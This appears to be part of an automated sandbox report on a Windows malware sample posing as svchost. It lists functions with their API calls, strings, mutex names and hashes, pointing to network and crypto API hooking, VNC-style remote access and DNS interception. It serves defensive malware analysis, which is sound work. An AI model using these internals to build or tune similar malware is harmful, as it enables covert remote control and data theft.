                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
                                                                                                                                                                                                              • String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
                                                                                                                                                                                                              • API String ID: 1216545827-2206184491
                                                                                                                                                                                                              • Opcode ID: 91e2f3722525c9d8bf648b3189d522e9345c414b25d409a3a8e79b4dd4ee74b7
                                                                                                                                                                                                              • Instruction ID: db81f695c23683ac35f0cb24fb28b5329cfe6c09669fd656e52c6132a0cedc7d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91e2f3722525c9d8bf648b3189d522e9345c414b25d409a3a8e79b4dd4ee74b7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9010865B8176739FA6032761D23F5B079E0F85E8CF150630B603F6440EAB9E60194BD
                                                                                                                                                                                                              Function 02CB31D8 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 56sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02CB31EC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB31FD
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB3211
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB321F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB3080,00000000,00000000,00000000), ref: 02CB3234
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40), ref: 02CB3245
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02CB324A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB325E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB326C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505), ref: 02CB3277
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,A23C4505,RFK), ref: 02CB3291
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CB329A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: A23C4505$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                              • API String ID: 505831200-3894408006
                                                                                                                                                                                                              • Opcode ID: 16ac51d762090dbf27fad77bab0c02b6cb0606f40d81cdc6560156904916181f
                                                                                                                                                                                                              • Instruction ID: f44963fcaa22b5889c808cc27d53931a72ffe3bc08984c753075501ec25b9a1a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16ac51d762090dbf27fad77bab0c02b6cb0606f40d81cdc6560156904916181f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49110430AC6792BBF62267609C0EF9E77986F44B55F008654FA15E31C1CBB09A058BA7
                                                                                                                                                                                                              Function 02CBC8D0 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 298COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$inet_ntoa$closesocketfreegetpeernamesetsockopt
                                                                                                                                                                                                              • String ID: RFB 003.006
                                                                                                                                                                                                              • API String ID: 725816019-3790533501
                                                                                                                                                                                                              • Opcode ID: 8106388b1c8f0cae7b4caaaa65a95dde605e56513f9df9ba78c8c08c9da21ae2
                                                                                                                                                                                                              • Instruction ID: 7c44727d83045713d548092a7a5ea17450dcb864dc45dad736218f3a85e12215
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8106388b1c8f0cae7b4caaaa65a95dde605e56513f9df9ba78c8c08c9da21ae2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19C149B0A006408FDB15CF29D484B96BBE5FF99310F1886AADC59CF356D775AA00CFA0
                                                                                                                                                                                                              Function 00401000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.ADVAPI32(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: CloseHandle.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1027056982-820036962
                                                                                                                                                                                                              • Opcode ID: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                              • Instruction ID: 0b24c45107c0befc32dd0ff84bd5674d64e160e2b6de00103b139920790b26b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 874152B5600208BBE7209B94DD49FAF7BBDEB89741F144026FB04FA2D0D7B49941C7A8
                                                                                                                                                                                                              Function 02CB19A0 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 56sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02CB19CC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB19D9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB19ED
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB19FF
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB17D0,00000000,00000000,00000000), ref: 02CB1A10
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02CB1A1F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB1A26
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4220), ref: 02CB1A2D
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,a23c4220,KBP), ref: 02CB1A47
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CB1A50
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$a23c4220
                                                                                                                                                                                                              • API String ID: 4173420962-2306827973
                                                                                                                                                                                                              • Opcode ID: 47eabcddcb19f73632d116d996205fcf4a20e0e164db93eebd0c1e3c23509563
                                                                                                                                                                                                              • Instruction ID: 51bdd577e1455cfe1c57c3a71f2d2783c12ccdbb451f776ee47787c891d0f835
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47eabcddcb19f73632d116d996205fcf4a20e0e164db93eebd0c1e3c23509563
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E014934AC7311BBF21267604C1AF9E769C5F05B91F180210FA19F61C08BE0AA00C6BA
                                                                                                                                                                                                              Function 02C9EB60 Relevance: 21.4, APIs: 7, Strings: 7, Instructions: 411COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C9EB74
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000002,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02C9F9DF,?,?), ref: 02C9EBD5
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000001,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02C9F9DF,?,?), ref: 02C9EC91
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C9EDD3
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C9EE8E
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C9EE9F
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C9EED1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                              • String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
                                                                                                                                                                                                              • API String ID: 438689982-3158524741
                                                                                                                                                                                                              • Opcode ID: 95227d684d5c7a808f0c54e523971142013cbd8607a9fdcedc92d1a679ef2a03
                                                                                                                                                                                                              • Instruction ID: b42dcc43e9ce69543689d4adb7680730b09870f14df39e282e560e003adb1012
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95227d684d5c7a808f0c54e523971142013cbd8607a9fdcedc92d1a679ef2a03
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40D14B31E006169FEF21CF68C88C7EEB7A6AFA5314F08455BE946A7240D730DA41CBD4
                                                                                                                                                                                                              Function 02C9A69F Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 264synchronizationwindowthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02C9A70E
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02C99523,00008001,?), ref: 02C9A737
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 02C9A73E
                                                                                                                                                                                                              • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02C9A752
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02C9A7C1
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02C99523,00008001,?), ref: 02C9A7DA
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 02C9A86B
                                                                                                                                                                                                              • GetParent.USER32(00000000), ref: 02C9A882
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02C9A8C9
                                                                                                                                                                                                              • GetWindowInfo.USER32 ref: 02C9A941
                                                                                                                                                                                                                • Part of subcall function 02C99FD0: GetWindowRect.USER32(?,?), ref: 02C99FF7
                                                                                                                                                                                                                • Part of subcall function 02C99FD0: IsRectEmpty.USER32(?), ref: 02C9A066
                                                                                                                                                                                                                • Part of subcall function 02C99FD0: GetWindowLongA.USER32(?,000000F0), ref: 02C9A076
                                                                                                                                                                                                                • Part of subcall function 02C99FD0: GetParent.USER32(?), ref: 02C9A08A
                                                                                                                                                                                                                • Part of subcall function 02C99FD0: MapWindowPoints.USER32(00000000,00000000,?,02C9A6F4), ref: 02C9A093
                                                                                                                                                                                                                • Part of subcall function 02C99FD0: SetWindowPos.USER32(?,00000000,?,02C9A6F4,00000000,00008001,0000630C,?,02C9A6F4,00000000,00008001,?), ref: 02C9A0B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$LongMutexObjectParentRectReleaseSingleWait$EmptyInfoMessagePointsPostProcessThread
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 4123185898-4251816714
                                                                                                                                                                                                              • Opcode ID: dc8e0e19600f7601028459ccd4672a09d8109720f4197cb69f986a11e1ff8bae
                                                                                                                                                                                                              • Instruction ID: 9236d337987bba41c77895bc7eb83a7711d866c490f49dda2ca76750e38671d4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc8e0e19600f7601028459ccd4672a09d8109720f4197cb69f986a11e1ff8bae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4910471684341AFDB149F28CC8DBAB37E4AF85358F048A2CF9569B2D1DBB0D541CBA1
                                                                                                                                                                                                              Function 02CA92D0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 139memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 02CA92D9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA930C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA9338
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA935F
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,?), ref: 02CA9392
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02CA93AC
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA93B3
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA93C3
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CA93CE
                                                                                                                                                                                                              • WSASetLastError.WS2_32(?), ref: 02CA9414
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorHeapLast$AllocProcessReadmemcpymemset
                                                                                                                                                                                                              • String ID: GET $POST
                                                                                                                                                                                                              • API String ID: 1455188016-2494278042
                                                                                                                                                                                                              • Opcode ID: 38ad5f49bd870b5f530048a891d7580d5971e6b7a58c35b7f59b213d1dee8298
                                                                                                                                                                                                              • Instruction ID: 516ec7f74bd4f2ee920022c4d996c59505569d4d3a6032a0a3758e914eb8dc91
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38ad5f49bd870b5f530048a891d7580d5971e6b7a58c35b7f59b213d1dee8298
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3414FB1D41219AFDB10DFA8D885BEEBBF9EF48704F508529E504E7240E734AA01CFA4
                                                                                                                                                                                                              Function 02CA03E0 Relevance: 21.1, APIs: 14, Instructions: 109memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02CA092A,00000000,?), ref: 02CA040B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02CA092A,00000000,?), ref: 02CA040E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,02CA092A,00000000,?), ref: 02CA041B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02CA092A,00000000,?), ref: 02CA041E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000,00000000,?,00000000,?,02CA092A,00000000,?), ref: 02CA0437
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,02CA092A,00000000,?), ref: 02CA0448
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02CA092A,00000000,?), ref: 02CA0458
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02CA092A,00000000,?), ref: 02CA045B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,02CA092A,00000000,?), ref: 02CA0468
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02CA092A,00000000,?), ref: 02CA046B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02CA092A,00000000,?), ref: 02CA047B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02CA092A,00000000,?), ref: 02CA047E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,02CA092A,00000000,?), ref: 02CA048B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02CA092A,00000000,?), ref: 02CA048E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate$Handle$CloseInformation
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2935687291-0
                                                                                                                                                                                                              • Opcode ID: 2a1f5e0a088a95fc51f456bc0ec3f9bff51bbbee0487f8aad0cd10bfef467254
                                                                                                                                                                                                              • Instruction ID: 175426a7c06529c18d850f0d423d810da663affba45bed98ab32e212e51ceaef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a1f5e0a088a95fc51f456bc0ec3f9bff51bbbee0487f8aad0cd10bfef467254
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9631A131A42222ABDB24AF71A868F5B7B9CFF857A9F44C516ED09DB240D770D510CAA0
                                                                                                                                                                                                              Function 02C96350 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53libraryloadernetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02C96350
                                                                                                                                                                                                              • DnsFlushResolverCache.DNSAPI ref: 02C9635A
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,75B07390), ref: 02C9636A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02C96383
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 02C9639F
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 02C963BB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Query_Main), ref: 02C963D7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$AdminCacheFlushLibraryLoadResolverUser
                                                                                                                                                                                                              • String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
                                                                                                                                                                                                              • API String ID: 2466897691-3547598143
                                                                                                                                                                                                              • Opcode ID: db26cb5cb35ce5766911155c754733ad28ffb8c3e510df2d4088ec0a8feed190
                                                                                                                                                                                                              • Instruction ID: c6d269e4d38391c7b98241be1521bfde6c7c1e808387195b3d81ab3d9f90207e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: db26cb5cb35ce5766911155c754733ad28ffb8c3e510df2d4088ec0a8feed190
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97016D717C1B1637BD1132761D0EF6F125E6F80EC97A50530B617F60C4DBA5E20194B9
                                                                                                                                                                                                              Function 02CB19B8 Relevance: 21.0, APIs: 9, Strings: 3, Instructions: 45sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02CB19CC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB19D9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB19ED
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB19FF
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB17D0,00000000,00000000,00000000), ref: 02CB1A10
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02CB1A1F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB1A26
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4220), ref: 02CB1A2D
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,a23c4220,KBP), ref: 02CB1A47
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CB1A50
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$a23c4220
                                                                                                                                                                                                              • API String ID: 4173420962-2306827973
                                                                                                                                                                                                              • Opcode ID: e54e580e052274e6a70002295f794497b565d9c0362c52adc32ea4fb973d07a1
